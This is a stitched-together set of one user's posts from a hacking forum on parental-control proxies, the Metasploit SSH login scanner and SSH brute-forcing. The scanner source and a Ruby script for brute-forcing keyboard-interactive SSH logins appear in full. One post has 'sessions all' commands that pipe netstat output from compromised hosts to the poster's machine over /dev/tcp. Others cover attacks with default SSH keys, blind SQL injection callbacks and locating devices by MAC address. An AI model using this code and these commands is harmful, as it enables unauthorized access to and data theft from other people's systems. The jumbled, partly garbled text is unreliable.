i8igmac

If the traffic is controlled at the router then it would take more skill to bypass this filtering... open source router OS that includes iptables really can be powerful. The simplest method might simply be to redirect all the kids traffic to your squid machine. http://www.penguintutor.com/kidsafe.php http://www.pihomeserver.fr/en/2015/09/01/un-controle-parental-grace-au-raspberry-pi-squid-et-squidguard/ I like how the squid config looks at this last weblink... If you get your self a propper setup please share the configuration files. Installing certificates on the kids devices also brings the ability to log the traffic. iptables -t nat -A PREROUTING -i eth0 -s ! squid-box -p tcp --dport 80 -j DNAT --to squid-box:3128 iptables -t nat -A POSTROUTING -o eth0 -s local-network -d squid-box -j SNAT --to iptables-box iptables -A FORWARD -s local-network -d squid-box -i eth0 -o eth0 -p tcp --dport 3128 -j ACCEPT

get a cheap router from goodwill. Make sure you check the model number before purchase for dd-wrt compatibility... If it has wireless n or 5.8 ghz speeds then that's a SCORE... flash with new open source firmware, configure the device as a kids wifi repeater... Now you can setup custom iptable rules. I'm sure there are already documented iptable configs online for kid safe surfing...

That is not entirely true, there are a few if expression's followed by a proper Echo.

It can be extremely frustrating when you spend 30 minutes writing content then its all lost once you click submit. It can be difficult to copy/paste information and organizing from my android, I do most of everything from my phone. it happen again lastnight from my labtop. Extremely frustrating... I think it can be triggered when you don't use (code) tabs (quote) tabs. The captcha seems to be effective enough. Disable the tarded filter. I doubt code injection will be successful from posting content... may sound ironic but if anything this content filtering has made hak5 more vulnerable. This could be the downfall of hak5. fresh content is important. This has prevent me from posting content several times.

My struggle is getting my hands on response data to check if 'Please login' exist if there are any metasploit gurus around here i could use some help... i can get close but only when i dig deep into the libs...

i hope to place a if expression before SUCCESS happens. if response.data.includes?("Please login:") #then submit the current CREDS scanner.ssh_socket.send_data(creds.user+"\n") scanner.ssh_socket.send_data(creds.pass+"\n") end Here is the modules/auxiliary/scanner/ssh/ssh_login.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/ssh' require 'net/ssh/command_stream' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SSH Login Check Scanner', 'Description' => %q{ This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. }, 'Author' => ['todb'], 'References' => [ [ 'CVE', '1999-0502'] # Weak password ], 'License' => MSF_LICENSE, 'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors ) register_options( [ Opt::RPORT(22) ], self.class ) register_advanced_options( [ Opt::Proxies, OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def rport datastore['RPORT'] end def session_setup(result, ssh_socket) return unless ssh_socket # Create a new session conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) merge_me = { 'USERPASS_FILE' => nil, 'USER_FILE' => nil, 'PASS_FILE' => nil, 'USERNAME' => result.credential.public, 'PASSWORD' => result.credential.private } info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})" s = start_session(self, info, merge_me, false, conn.lsock) self.sockets.delete(ssh_socket.transport.socket) # Set the session platform case result.proof when /Linux/ s.platform = "linux" when /Darwin/ s.platform = "osx" when /SunOS/ s.platform = "solaris" when /BSD/ s.platform = "bsd" when /HP-UX/ s.platform = "hpux" when /AIX/ s.platform = "aix" when /Win32|Windows/ s.platform = "windows" when /Unknown command or computer name/ s.platform = "cisco-ios" end s end def run_host(ip) @ip = ip cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'], ) cred_collection = prepend_db_passwords(cred_collection) scanner = Metasploit::Framework::LoginScanner::SSH.new( host: ip, port: rport, cred_details: cred_collection, proxies: datastore['Proxies'], stop_on_success: datastore['STOP_ON_SUCCESS'], bruteforce_speed: datastore['BRUTEFORCE_SPEED'], connection_timeout: datastore['SSH_TIMEOUT'], framework: framework, framework_module: self, ) scanner.verbosity = :debug if datastore['SSH_DEBUG'] scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: self.fullname, workspace_id: myworkspace_id ) case result.status when Metasploit::Model::Login::Status::SUCCESSFUL print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'" credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) session_setup(result, scanner.ssh_socket) :next_user when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}" scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? invalidate_login(credential_data) :abort when Metasploit::Model::Login::Status::INCORRECT vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'" invalidate_login(credential_data) scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? else invalidate_login(credential_data) scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? end end end end

here is a example of logging into a keyboard-interactive login shell.rb this is a start of a brute force keyboard-interactive ssh require 'rubygems' require 'net/ssh' # 73.9.26.15 host=ARGV[0] user=ARGV[1] pass=ARGV[2] result='' host_execution=false Net::SSH.start(host, user, :password => pass) do |ssh| # Open a channel channel = ssh.open_channel do |channel, success| channel.request_pty channel.exec("help") channel.on_data do |channel, data| print data sleep 3 # Send the password if data.include?("login:") channel.send_data "#{user}\n" # print("#{user}") end if data.include?("password :") channel.send_data("#{pass}\n") print("#{pass}") end if host_execution==false if data.include?('rkscli:') host_execution=true puts channel.send_data("help\n") channel.wait end end if host_execution==true if data.include?('rkscli:') # puts channel.send_data(gets) channel.wait end end end end # Wait for opened channel channel.wait end

What ports are used, when a target machine runs the trojin, does it connect back to your machine? If so then you would have configured port forwarding? What port if this? You should monitor this port, its possible random traffic hit your open port but also possible your tool is a backdoor. hackforum is full of bs tools. I may have misunderstood what you see. A vnc session? Maybe some one ran your trojin from a vm.

This is the 3rd time. Previous attempts to post content included some ruby code. https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/ssh.rb Edit. Strange it works this time. Ill take screen shots next time this happens ;.,/'[]{8\=-~=~ `ls` system("uname") }

I'm looking to automate the login process on a my router running dropbear. This ssh service is configured in a way that would handle ssh logins with keyboard-interactive authentication. if you are unsure what this is. You can test your local machines ssh -o PreferredAuthentications=none -v 192.168.0.1 Authentications that can continue: publickey,password Typically you would see (publickey,password) In My situation this information is not displayed and I'm forced to login with a interactive session. when you enter a interactive session you would see this below... notice how the user has already been determined by the command used but the session ask for the username ssh admin@192.168.69.1 welcome to Ruckus running dropbear Please login: admin Password:****** I hope to use ruby net/ssh or even metasploit to login. So far all my test to automate the login process have failed... there is some documentation with ruby net/ssh and keyboard-interactive sessions but I can't find any examples online.

When i post a new thread, I'm redirected to a error with the string above saying there is a security problem, if this problem was false report the strimg to the network admin. The last attempt to create a new thread only had a few links to metasploit on githib

3c0783109a6379bb i cant post content here

What about lot devices. Routers, network storage, arm devices. its possible these kind of devices where flashed with duplicate SSH_keys. edit; Or if a bunch of identicle devices where flashed with the same os, could the mac address be incorperated in generating the new ssh key or something predictable.

So. I guess I misunderstood... During installation, a new key is generated? The same goes for routers and other little nas devices?

im looking for a collection of keys i could play around with, does any one know of a list of default keys for download? Does such a thing exist? This metasploit module will attempt to loginto a host with a set KEY => kali./ssh/ssh_key Just a example, any one who installs kali could be vulnerable to this type of attack, the key is the same on all kali machines, after kali is installed it is recamended this ssh_key be replaced. so is there a list kf common default ssh keys any one has seen for download?

Yes you can. But before we talk about hacking, first watch 50 shades of grey. you must also watch a documentary on Gary Ridgway.

yah its random generated application name. 217.23.5.33:443 ESTABLISHED agy46jk87

I found the CnC... all of these devices are connected to the same identicle ip... Its a vpn service... so I guess all that is left to do is contact the vpn service and submit the logs... turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done first i started a listiner that greps for a specific ip... then i sent 2 commands off to all current sessions msf auxiliary(ssh_login) > sessions all -c 'netstat -nt > net' msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888 then the results pour into my netcat listener turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done tcp 0 0 192.168.1.130:42074 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.130:44592 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.10.101:40764 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.10.102:47652 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.1.4:55475 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.4:39033 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.1.103:47597 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.103:56610 217.23.5.33:443 CLOSE_WAIT i could turn this into a metasploit module or resource script.

You could help in providing mind bottling theories to solving this question... how do you get shells... The honey pot was fun but here was my next steps I took to exploring this botnet that is attacking my Super-L33t-wifi-router There have been questions around here about seting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public ip... I have answered in this video. If any one wants a demonstration on the steps I took in setting up the honey pot and ip tables used to redirect and monitor traffic. I could make a video.

This looks interesting. I was thinking client mac addresses is what I maybe looking for.

Google used to drive around and log mac addresses of access points and log gps location until this raised privacy concerns. So what they did after this was used smart phones to collect this data in the same manner but with the proper terms and conditions accepted by the user. One of my habits is watching traffic on my network. I have seen my old samsung s5 sending mac adddress with gps x,y locations in plain text. This was a running service that sparked my intrest. this information can be used to locate a labtop, tablet, cell phone or anything with a mac address. If millions Of smart phone users have been collecting this data and building googles database. It should be no problem to search for a mac address and retrieve a gps location. Here is a example of a mac address and gps logger/tracker. https://cellphonetrackers.org/gsm/wifi-tracker.php Here is an google api https://developers.google.com/maps/documentation/geolocation/intro Any one know if google has given public accesss to this database?

Just a quick test. Set RPORT to its default 4444. If I read your post correctly, you said apache is on port 8079 and your handler faild to bind to this port because it is already in use?

not sure if kali needs sudo. Bit give it a try sudo msfconsole Also you should not use a port that kali currently has in use by other services. Type netstat -ntlp this shows ports currently in use

You could enable 'display_errors = on' in your php.ini file... just close your eyes and type on your keyboard if you want to practice blind sql injection. As said by digninja. You don't see any Data display on the page that a error exist or data has been modified due to the web applications design. If you see your page sleep for 20 seconds then display data then this is how you prove sql exist. it may take multiple attempts to confirm injection exist. Like telling the server to ping your remote machine. Tcp connect to a remote machine. Email a personal account.

has any one tested this... this seems huge. Pineapple effected. Openwrt/ddwrt effected.